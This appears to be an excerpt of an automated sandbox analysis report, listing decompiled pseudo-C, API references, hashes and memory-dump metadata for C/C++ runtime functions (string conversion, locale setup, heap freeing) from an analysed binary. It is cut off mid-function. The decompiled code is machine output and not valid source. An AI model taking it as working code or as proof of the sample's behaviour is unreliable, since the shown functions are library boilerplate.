0x004a0e93
0x004a0e95
0x004a0e95
0x004a0e99
0x004a0e6b
0x004a0e6b
0x004a0e6b
0x004a0e6e
0x004a0e6e
0x004a0d92
0x00000000
0x004a0d92
0x004a0d90
0x004a0d8e
0x00000000
0x004a0d97
0x004a0d97
0x004a0d99
0x004a0da0
0x00000000
0x004a0da2
0x00000000
0x004a0da0
0x004a0d65
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 004A0D37
___except_validate_context_record.LIBVCRUNTIME ref: 004A0D3F
_ValidateLocalCookies.LIBCMT ref: 004A0DC8
__IsNonwritableInCurrentImage.LIBCMT ref: 004A0DF3
_ValidateLocalCookies.LIBCMT ref: 004A0E48

Strings

csm, xrefs: 004A0DDD

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bfae582a951fb672c263695b91f8167b884e87247806ae16ade4d86b9c8f63fb
Instruction ID: a42adac0b47f7876aebff84c758353745039ee7ce7b8fd4aa8a543e889740863
Opcode Fuzzy Hash: bfae582a951fb672c263695b91f8167b884e87247806ae16ade4d86b9c8f63fb
Instruction Fuzzy Hash: BC41F931A00208ABCF10DF69C884A9F7FB1EF56314F14816BE8146B392C779AA15CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004C2E01, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004C2E01(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E004B76AE(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E004B3009(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E004A9638(GetLastError());
								}
							}
							E004B2FCF(_t40);
							_t14 = _t35;
						} else {
							E004A9638(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E004A966E())) = 0x16;
						E004A5E77();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E004A966E())) = 0x16;
				E004A5E77();
				return 0;
			}

0x004c2e06
0x004c2e0b
0x004c2e25
0x004c2e28
0x004c2e2a
0x004c2e43
0x004c2e45
0x004c2e4c
0x004c2e4e
0x004c2e57
0x004c2e58
0x004c2e5c
0x004c2e62
0x004c2e65
0x004c2e67
0x004c2e81
0x004c2e84
0x004c2e86
0x004c2e93
0x004c2e99
0x004c2e9b
0x004c2eaf
0x004c2eb1
0x004c2eb5
0x004c2eb5
0x004c2eb6
0x004c2e9d
0x004c2ea4
0x004c2ea9
0x004c2e9b
0x004c2eb9
0x004c2ebe
0x004c2e69
0x004c2e70
0x004c2e75
0x004c2e75
0x004c2e2c
0x004c2e31
0x004c2e37
0x004c2e3c
0x004c2e3c
0x00000000
0x004c2ec3
0x004c2e12
0x004c2e18
0x00000000

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817a56a52265f12864cebd682b2b2ef09c5e5b91c149aa5445a8a4e0b2b547cb
Instruction ID: 8a43e5b85d08f79157e15a693e6663e65f2fe8fce2127eeeb93c8ed900ede2cd
Opcode Fuzzy Hash: 817a56a52265f12864cebd682b2b2ef09c5e5b91c149aa5445a8a4e0b2b547cb
Instruction Fuzzy Hash: 62113A76504118BFC7202FB29D04EAB3B5CDFD2734B10022FF815D6251DEB88D019678

Uniqueness

Uniqueness Score: -1.00%

Function 00492967, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00492967(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t34;
				signed int _t38;
				signed int _t39;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr _t52;
				signed int _t53;
				void* _t63;
				intOrPtr _t66;
				void* _t67;
				void* _t71;

				_t71 = __eflags;
				_t52 = __ecx;
				_push(0x30);
				E0049D90B(0x4d6da8, __edi, __esi);
				_t49 = _t52;
				 *((intOrPtr*)(_t67 - 0x10)) = _t49;
				_t32 = E00489787(_t67 - 0x3c);
				_t50 = _t49 + 0x2c;
				_t53 = 0xb;
				memcpy(_t50, _t32, _t53 << 2);
				_t34 = E004A5AB9();
				_t66 =  *((intOrPtr*)(_t67 - 0x10));
				_t63 = _t34;
				 *((intOrPtr*)(_t67 - 0x10)) = _t66;
				 *((intOrPtr*)(_t66 + 8)) = 0;
				 *((intOrPtr*)(_t66 + 0x10)) = 0;
				 *((intOrPtr*)(_t66 + 0x14)) = 0;
				 *((intOrPtr*)(_t66 + 0x18)) = 0;
				_push(_t50);
				_push(0);
				 *((intOrPtr*)(_t67 - 4)) = 0;
				 *((intOrPtr*)(_t66 + 8)) = E004302EE(_t63, _t66, _t67, _t71,  *((intOrPtr*)(_t63 + 0x1c)));
				E0049276F(_t66, 0, _t63);
				if( *((char*)(_t66 + 0x28)) == 0) {
					_t38 =  *((intOrPtr*)(_t63 + 0x29));
				} else {
					_t38 =  *((intOrPtr*)(_t63 + 0x28));
				}
				_t39 = _t38;
				 *(_t66 + 0x1c) = _t39;
				if(_t39 < 0 || _t39 >= 0x7f) {
					 *(_t66 + 0x1c) =  *(_t66 + 0x1c) & 0x00000000;
				}
				_t20 = _t66 + 0x20; // 0x20
				_t51 = _t20;
				E00493C84(_t66, _t51,  *((char*)(_t63 + 0x2b)),  *((char*)(_t63 + 0x2a)),  *((char*)(_t63 + 0x2e)));
				_t24 = _t66 + 0x24; // 0x24
				_t47 = E00493C84(_t66, _t24,  *((char*)(_t63 + 0x2d)),  *((char*)(_t63 + 0x2c)),  *((char*)(_t63 + 0x2f)));
				if( *((char*)(_t67 + 0xc)) != 0) {
					_t47 = 0x76782b24;
					 *_t51 = 0x76782b24;
					 *((intOrPtr*)(_t66 + 0x24)) = 0x76782b24;
				}
				return E0049D8D4(_t47);
			}

0x00492967
0x00492967
0x00492967
0x0049296e
0x00492973
0x00492975
0x0049297c
0x00492981
0x00492988
0x0049298b
0x0049298d
0x00492992
0x00492995
0x00492999
0x0049299c
0x0049299f
0x004929a2
0x004929a5
0x004929a8
0x004929a9
0x004929ad
0x004929b8
0x004929c0
0x004929c9
0x004929d0
0x004929cb
0x004929cb
0x004929cb
0x004929d3
0x004929d6
0x004929db
0x004929e2
0x004929e2
0x004929ea
0x004929ea
0x004929fb
0x00492a04
0x00492a15
0x00492a1e
0x00492a20
0x00492a25
0x00492a27
0x00492a27
0x00492a2f

APIs

__EH_prolog3.LIBCMT ref: 0049296E
__Getcvt.LIBCPMT ref: 0049297C

Part of subcall function 004302EE: _strlen.LIBCMT ref: 004302F4

_Getvals.LIBCPMT ref: 004929C0
_Mpunct.LIBCPMT ref: 004929FB
_Mpunct.LIBCPMT ref: 00492A15

Strings

$+xv, xrefs: 00492A20

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mpunct$GetcvtGetvalsH_prolog3_strlen
String ID: $+xv
API String ID: 3651146260-1686923651
Opcode ID: f4d19e44bb3f8f729105b92bc8e9b40253ebc7d2e2f39def98527a28a416bb50
Instruction ID: b4e95e44012cd49fa6c3d61354664531fb46d18531c6c7f87413b91ff46614af
Opcode Fuzzy Hash: f4d19e44bb3f8f729105b92bc8e9b40253ebc7d2e2f39def98527a28a416bb50
Instruction Fuzzy Hash: F521C4B1904B516EDB25DF75889073BBEF8AB09304F04496FE499C7A42D778EA01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004BD7D6, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004BD7D6(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E004BD51D(_t45, 7);
					E004BD51D(_t45 + 0x1c, 7);
					E004BD51D(_t45 + 0x38, 0xc);
					E004BD51D(_t45 + 0x68, 0xc);
					E004BD51D(_t45 + 0x98, 2);
					E004B2FCF( *((intOrPtr*)(_t45 + 0xa0)));
					E004B2FCF( *((intOrPtr*)(_t45 + 0xa4)));
					E004B2FCF( *((intOrPtr*)(_t45 + 0xa8)));
					E004BD51D(_t45 + 0xb4, 7);
					E004BD51D(_t45 + 0xd0, 7);
					E004BD51D(_t45 + 0xec, 0xc);
					E004BD51D(_t45 + 0x11c, 0xc);
					E004BD51D(_t45 + 0x14c, 2);
					E004B2FCF( *((intOrPtr*)(_t45 + 0x154)));
					E004B2FCF( *((intOrPtr*)(_t45 + 0x158)));
					E004B2FCF( *((intOrPtr*)(_t45 + 0x15c)));
					return E004B2FCF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x004bd7dc
0x004bd7e1
0x004bd7ea
0x004bd7f5
0x004bd800
0x004bd80b
0x004bd819
0x004bd824
0x004bd82f
0x004bd83a
0x004bd848
0x004bd856
0x004bd867
0x004bd875
0x004bd883
0x004bd88e
0x004bd899
0x004bd8a4
0x00000000
0x004bd8b4
0x004bd8b9

APIs

Part of subcall function 004BD51D: _free.LIBCMT ref: 004BD546

_free.LIBCMT ref: 004BD824

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

_free.LIBCMT ref: 004BD82F
_free.LIBCMT ref: 004BD83A
_free.LIBCMT ref: 004BD88E
_free.LIBCMT ref: 004BD899
_free.LIBCMT ref: 004BD8A4
_free.LIBCMT ref: 004BD8AF

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: be821af3cec7c42125fadd012f3e195aede0362c300babedc8f069374784c5e4
Instruction ID: 1de44639f9dc7f38dc944381fc3a262a6698af6d5ab753183e87371803ba3bea
Opcode Fuzzy Hash: be821af3cec7c42125fadd012f3e195aede0362c300babedc8f069374784c5e4
Instruction Fuzzy Hash: 6C1181B1940B04BAD531B7B2CC07FDBB7AC5F0870CF80085FB29D66152EA6DB5149A74

Uniqueness

Uniqueness Score: -1.00%

Function 00482DFE, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00482DFE() {
				signed int _t61;
				void* _t66;
				signed int _t82;
				intOrPtr* _t83;
				intOrPtr _t94;
				signed int _t102;
				void* _t105;
				signed int _t118;
				void* _t119;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t131;
				void* _t132;
				void* _t133;

				_push(0x10);
				E0049D93F(0x4c4f82, _t123, _t126);
				_t94 =  *((intOrPtr*)(_t132 + 8));
				E00488DEA(_t132 - 0x18, 0);
				 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
				_t124 =  *0x4ef4cc;
				 *(_t132 - 0x1c) = _t124;
				_t61 = E0042B315(_t94, E0042B22E(0x4ed914, _t124, _t126, _t133));
				_t127 = _t61;
				if(_t61 != 0) {
					L6:
					 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
					E00488E42(_t132 - 0x18);
					return E0049D8E9(_t127, _t124, _t127);
				} else {
					if(_t124 == 0) {
						_push(_t94);
						_push(_t132 - 0x1c);
						_t66 = E0043CF65(_t124, _t127, __eflags);
						_pop(_t102);
						__eflags = _t66 - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							E0049D9AD(0x4d5adb, _t124, _t127);
							_t125 = _t102;
							 *(_t132 - 0x1c) = _t125;
							 *((intOrPtr*)(_t132 - 0x30)) =  *((intOrPtr*)(_t132 + 8));
							 *(_t132 - 0x18) = 0;
							_push(0);
							_push(_t125);
							E00431B36(_t132 - 0x38, _t127, __eflags);
							 *(_t132 - 4) = 0;
							__eflags =  *(_t132 - 0x34);
							if( *(_t132 - 0x34) != 0) {
								 *(_t132 - 4) = 1;
								 *(_t132 - 4) = 2;
								_t131 =  *((intOrPtr*)( *_t125 + 4)) + _t125;
								 *((intOrPtr*)(_t132 - 0x24)) = 0;
								 *((char*)(_t132 - 0x20)) = 1;
								 *((char*)(_t132 - 0x1f)) = 0;
								_t82 =  *(_t131 + 0x38);
								 *(_t132 - 0x2c) = _t82;
								__eflags = _t82;
								 *((char*)(_t132 - 0x28)) = __eflags == 0;
								 *((char*)(_t132 - 0x27)) = 0;
								_t83 = E00433006(_t125, _t131, __eflags);
								 *((intOrPtr*)( *_t83 + 0x2c))(_t132 - 0x48,  *(_t132 - 0x2c),  *((intOrPtr*)(_t132 - 0x28)),  *((intOrPtr*)(_t132 - 0x24)),  *((intOrPtr*)(_t132 - 0x20)), _t131, _t132 - 0x18,  *((intOrPtr*)(_t132 - 0x30)), E0042B7A4( *((intOrPtr*)( *_t125 + 4)) + _t125), _t132 - 0x40);
								 *(_t132 - 4) = 1;
								E0042B2E4(_t132 - 0x40);
								 *(_t132 - 4) = 0;
							}
							_t105 =  *((intOrPtr*)( *_t125 + 4)) + _t125;
							_push(0);
							_t119 = 4;
							__eflags =  *(_t105 + 0x38);
							_t120 =  !=  ? 0 : _t119;
							_t121 = ( !=  ? 0 : _t119) |  *(_t105 + 0xc) |  *(_t132 - 0x18);
							_push(( !=  ? 0 : _t119) |  *(_t105 + 0xc) |  *(_t132 - 0x18));
							E0042B73A(_t105, ( !=  ? 0 : _t119) |  *(_t105 + 0xc) |  *(_t132 - 0x18), _t125,  *(_t105 + 0xc) |  *(_t132 - 0x18));
							_t54 = _t132 - 4;
							 *_t54 =  *(_t132 - 4) | 0xffffffff;
							__eflags =  *_t54;
							E0043119F();
							return E0049D8FA(_t125, _t125,  *(_t105 + 0xc) |  *(_t132 - 0x18));
						} else {
							_t127 =  *(_t132 - 0x1c);
							 *(_t132 - 0x14) = 0;
							 *(_t132 - 0x14) = _t127;
							 *(_t132 - 4) = 1;
							E0048919D(_t127);
							 *((intOrPtr*)( *_t127 + 4))();
							 *0x4ef4cc = _t127;
							 *(_t132 - 0x1c) = 0;
							E0042FDE0(_t132 - 0x14, _t132 - 0x1c);
							 *(_t132 - 4) = 0;
							_t118 =  *(_t132 - 0x14);
							__eflags = _t118;
							if(_t118 != 0) {
								 *((intOrPtr*)( *_t118))(1);
							}
							goto L6;
						}
					} else {
						_t127 = _t124;
						goto L6;
					}
				}
			}

0x00482dfe
0x00482e05
0x00482e0a
0x00482e12
0x00482e17
0x00482e20
0x00482e26
0x00482e31
0x00482e36
0x00482e3a
0x00482e9a
0x00482e9a
0x00482ea1
0x00482ead
0x00482e3c
0x00482e3e
0x00482e47
0x00482e48
0x00482e49
0x00482e4f
0x00482e50
0x00482e53
0x00482eae
0x00482eb3
0x00482ebb
0x00482ec0
0x00482ec2
0x00482ec8
0x00482ecd
0x00482ed0
0x00482ed1
0x00482ed5
0x00482eda
0x00482edd
0x00482ee0
0x00482ee6
0x00482efb
0x00482f04
0x00482f06
0x00482f09
0x00482f0d
0x00482f10
0x00482f13
0x00482f16
0x00482f18
0x00482f1c
0x00482f1f
0x00482f41
0x00482f44
0x00482f4b
0x00482f50
0x00482f50
0x00482f8e
0x00482f96
0x00482f99
0x00482f9c
0x00482f9f
0x00482fa2
0x00482fa4
0x00482fa5
0x00482faa
0x00482faa
0x00482faa
0x00482fb1
0x00482fbd
0x00482e55
0x00482e55
0x00482e5a
0x00482e5d
0x00482e60
0x00482e65
0x00482e6f
0x00482e75
0x00482e7f
0x00482e83
0x00482e8a
0x00482e8d
0x00482e90
0x00482e92
0x00482e98
0x00482e98
0x00000000
0x00482e92
0x00482e40
0x00482e40
0x00000000
0x00482e40
0x00482e3e

APIs

__EH_prolog3_GS.LIBCMT ref: 00482E05
std::_Lockit::_Lockit.LIBCPMT ref: 00482E12

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 00482E65
std::_Lockit::~_Lockit.LIBCPMT ref: 00482EA1
Concurrency::cancel_current_task.LIBCPMT ref: 00482EAE
__EH_prolog3_catch_GS.LIBCMT ref: 00482EBB

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3_catch_Register
String ID:
API String ID: 2139927958-0
Opcode ID: 6fa427285ec418c5199dfef394dcfec773d638439d51e7d2bbbf2e8237c4b72c
Instruction ID: 50febd9b041eb97a28526f49fe3040effd6539bd35b47a8f129d838c57dbac5a
Opcode Fuzzy Hash: 6fa427285ec418c5199dfef394dcfec773d638439d51e7d2bbbf2e8237c4b72c
Instruction Fuzzy Hash: 1551CF71E00219DFCF05EFA5C985AEEBBB4EF48314F14406EE515A7292CB789E01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00437AF5, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00437AF5(void* __edi, void* __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12, void _a16) {
				signed int _v4;
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _t61;
				void* _t66;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t83;
				intOrPtr _t85;
				signed int _t87;
				signed int _t90;
				intOrPtr _t105;
				signed int _t106;
				signed int _t108;
				intOrPtr* _t115;
				signed int _t116;
				intOrPtr _t121;
				signed int _t131;
				signed int _t133;
				signed int _t137;
				signed int _t138;
				signed int _t140;
				intOrPtr* _t143;
				void* _t146;
				signed int _t149;
				void* _t152;

				_t152 = __eflags;
				_push(0x10);
				E0049D93F(0x4c4f82, __edi, __esi);
				_t105 = _a8;
				E00488DEA( &_v24, 0);
				_v4 = _v4 & 0x00000000;
				_t137 =  *0x4ef480;
				_v28 = _t137;
				_t61 = E0042B315(_t105, E0042B22E(0x4ef528, _t137, __esi, _t152));
				_t142 = _t61;
				if(_t61 != 0) {
					L6:
					_v4 = _v4 | 0xffffffff;
					E00488E42( &_v24);
					return E0049D8E9(_t142, _t137, _t142);
				} else {
					if(_t137 == 0) {
						_push(_t105);
						_push( &_v28);
						_t66 = E00437DAC(_t137, _t142, __eflags);
						_pop(_t115);
						__eflags = _t66 - 0xffffffff;
						if(__eflags == 0) {
							E0042B042(__eflags);
							asm("int3");
							E0049D976(0x4c6361, _t137, _t142);
							_t143 = _t115;
							asm("cdq");
							_t116 = 0x18;
							_t106 = (_a8 -  *_t143) / _t116;
							_t74 =  *((intOrPtr*)(_t143 + 4)) -  *_t143;
							asm("cdq");
							_t75 = _t74 / _t116;
							_t133 = _t74 % _t116;
							_v28 = _t75;
							__eflags = _t75 - 0xaaaaaaa;
							if(_t75 == 0xaaaaaaa) {
								E0042E45E(_t116, _t146);
								asm("int3");
								_push(_t146);
								_push(0xffffffff);
								_push(0x4c637c);
								_push( *[fs:0x0]);
								_push(_t143);
								_push(_t137);
								_t78 =  *0x4eb018; // 0xa3bb88a6
								_push(_t78 ^ _t149);
								 *[fs:0x0] =  &_v8;
								_t138 = _t133;
								__eflags = _a16 - _t138;
								_t82 =  <  ? _a16 : _t138;
								_t83 = E0049FC6A(_t116, _a12,  <  ? _a16 : _t138);
								__eflags = _t83;
								if(_t83 == 0) {
									__eflags = _a8 - _t138;
									if(_a8 <= _t138) {
										asm("sbb eax, eax");
										_t83 =  ~_t83;
									} else {
										_t83 = _t83 | 0xffffffff;
									}
								}
								 *[fs:0x0] = _v16;
								return _t83;
							} else {
								_t85 = E00437E76(_t143, _t75 + 1);
								_v24 = _t85;
								_push(_t85);
								_t140 = E004376F1();
								_v36 = _t140;
								_t108 = _t106 * 0x18 + _t140;
								_t33 = _t108 + 0x18; // 0x18
								_t87 = _t33;
								_v32 = _t87;
								_v20 = _t87;
								_v4 = _v4 & 0x00000000;
								E0042CE90(_t108, _a12);
								_v20 = _t108;
								_t134 =  *((intOrPtr*)(_t143 + 4));
								_t121 =  *_t143;
								__eflags = _a8 -  *((intOrPtr*)(_t143 + 4));
								if(__eflags != 0) {
									_push(_t143);
									_push(_t140);
									E004380AB(_t121, _a8, _t140, _t143, __eflags);
									_v20 = _t140;
									_t134 =  *((intOrPtr*)(_t143 + 4));
									_t121 = _a8;
									_t46 = _t108 + 0x18; // 0x18
									_t90 = _t46;
								} else {
									_t90 = _t140;
								}
								_push(_t143);
								_push(_t90);
								E004380AB(_t121, _t134, _t140, _t143, __eflags);
								_v4 = _v4 | 0xffffffff;
								__eflags = _v28 + 1;
								E00437E2D(_t143, _t140, _v28 + 1, _v24);
								return E0049D8D4(_t108);
							}
						} else {
							_t142 = _v28;
							_v20 = 0;
							_v20 = _t142;
							_v4 = 1;
							E0048919D(_t142);
							 *((intOrPtr*)( *_t142 + 4))();
							 *0x4ef480 = _t142;
							_v28 = 0;
							E0042FDE0( &_v20,  &_v28);
							_v4 = 0;
							_t131 = _v20;
							__eflags = _t131;
							if(_t131 != 0) {
								 *((intOrPtr*)( *_t131))(1);
							}
							goto L6;
						}
					} else {
						_t142 = _t137;
						goto L6;
					}
				}
			}

0x00437af5
0x00437af5
0x00437afc
0x00437b01
0x00437b09
0x00437b0e
0x00437b17
0x00437b1d
0x00437b28
0x00437b2d
0x00437b31
0x00437b91
0x00437b91
0x00437b98
0x00437ba4
0x00437b33
0x00437b35
0x00437b3e
0x00437b3f
0x00437b40
0x00437b46
0x00437b47
0x00437b4a
0x00437ba5
0x00437baa
0x00437bb2
0x00437bb7
0x00437bbe
0x00437bc1
0x00437bc4
0x00437bc9
0x00437bcb
0x00437bcc
0x00437bcc
0x00437bce
0x00437bd1
0x00437bd6
0x00437c7e
0x00437c83
0x00437c84
0x00437c87
0x00437c89
0x00437c94
0x00437c95
0x00437c96
0x00437c97
0x00437c9e
0x00437ca2
0x00437ca8
0x00437caa
0x00437cb2
0x00437cb9
0x00437cc1
0x00437cc3
0x00437cc5
0x00437cc8
0x00437ccf
0x00437cd1
0x00437cca
0x00437cca
0x00437cca
0x00437cc8
0x00437cd6
0x00437ce1
0x00437bdc
0x00437be0
0x00437be5
0x00437be8
0x00437bee
0x00437bf0
0x00437bf6
0x00437bf8
0x00437bf8
0x00437bfb
0x00437bfe
0x00437c01
0x00437c0a
0x00437c0f
0x00437c12
0x00437c15
0x00437c17
0x00437c1a
0x00437c20
0x00437c21
0x00437c25
0x00437c2c
0x00437c2f
0x00437c32
0x00437c35
0x00437c35
0x00437c1c
0x00437c1c
0x00437c1c
0x00437c38
0x00437c39
0x00437c3a
0x00437c41
0x00437c4b
0x00437c50
0x00437c5c
0x00437c5c
0x00437b4c
0x00437b4c
0x00437b51
0x00437b54
0x00437b57
0x00437b5c
0x00437b66
0x00437b6c
0x00437b76
0x00437b7a
0x00437b81
0x00437b84
0x00437b87
0x00437b89
0x00437b8f
0x00437b8f
0x00000000
0x00437b89
0x00437b37
0x00437b37
0x00000000
0x00437b37
0x00437b35

APIs

__EH_prolog3_GS.LIBCMT ref: 00437AFC
std::_Lockit::_Lockit.LIBCPMT ref: 00437B09

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 00437B5C
std::_Lockit::~_Lockit.LIBCPMT ref: 00437B98
Concurrency::cancel_current_task.LIBCPMT ref: 00437BA5
__EH_prolog3_catch.LIBCMT ref: 00437BB2

Part of subcall function 004380AB: __EH_prolog3_GS.LIBCMT ref: 004380B2

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3_catchRegister
String ID:
API String ID: 846158916-0
Opcode ID: 8ce61130911d86fa77837828620decba9e796d094e6f5da35c213156f2f2b0a6
Instruction ID: 0229e73a59ecc7ef70ba1c454b14f1c3c89d4fe378b42a7e725025926d396679
Opcode Fuzzy Hash: 8ce61130911d86fa77837828620decba9e796d094e6f5da35c213156f2f2b0a6
Instruction Fuzzy Hash: E841D7B1E042099FCB14EFA9D4819AFB7F5EF58314F60452FF455A7282DB389E018B98

Uniqueness

Uniqueness Score: -1.00%

Function 004A13AF, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004A13AF(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0x4eb070 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004A25CD(_t13, __eflags,  *0x4eb070);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E004A2608(_t14, __eflags,  *0x4eb070, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = L004A281E();
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E004A2608(_t18, __eflags,  *0x4eb070, 0);
								} else {
									_t8 = E004A2608(_t18, __eflags,  *0x4eb070, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L004A5B7B(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x004a13af
0x004a13b6
0x004a13c9
0x004a13d0
0x004a13d2
0x004a13d3
0x004a13d6
0x004a13ef
0x004a13ef
0x004a13d8
0x004a13d8
0x004a13da
0x004a13e4
0x004a13eb
0x004a13ed
0x004a13f4
0x004a13fd
0x004a1400
0x004a1401
0x004a1403
0x004a1417
0x004a1417
0x004a1420
0x004a1405
0x004a140c
0x004a1412
0x004a1413
0x004a1415
0x004a1429
0x004a142b
0x004a142b
0x00000000
0x00000000
0x00000000
0x004a1415
0x004a142e
0x00000000
0x00000000
0x00000000
0x004a13ed
0x004a13da
0x004a1436
0x004a1440
0x004a13b8
0x004a13ba
0x004a13ba

APIs

GetLastError.KERNEL32(?,?,004A13A6,004A1342,0049DF2B), ref: 004A13BD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004A13CB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004A13E4
SetLastError.KERNEL32(00000000,004A13A6,004A1342,0049DF2B), ref: 004A1436

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 41f1b5c0f92d7fa1fbde45e73366624ce76cfca3c203616131b92d4e50e375cc
Instruction ID: e322488fc87d8f6f56728e4f6ae6b5a8be3650b98cbe535efeea6d341be13f0a
Opcode Fuzzy Hash: 41f1b5c0f92d7fa1fbde45e73366624ce76cfca3c203616131b92d4e50e375cc
Instruction Fuzzy Hash: 5A01D83210E3269EA6242B7D7CC59672648EB37775B20033FF920491F2FF595C42A28C

Uniqueness

Uniqueness Score: -1.00%

Function 0049981D, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0049981D() {
				signed int _t47;
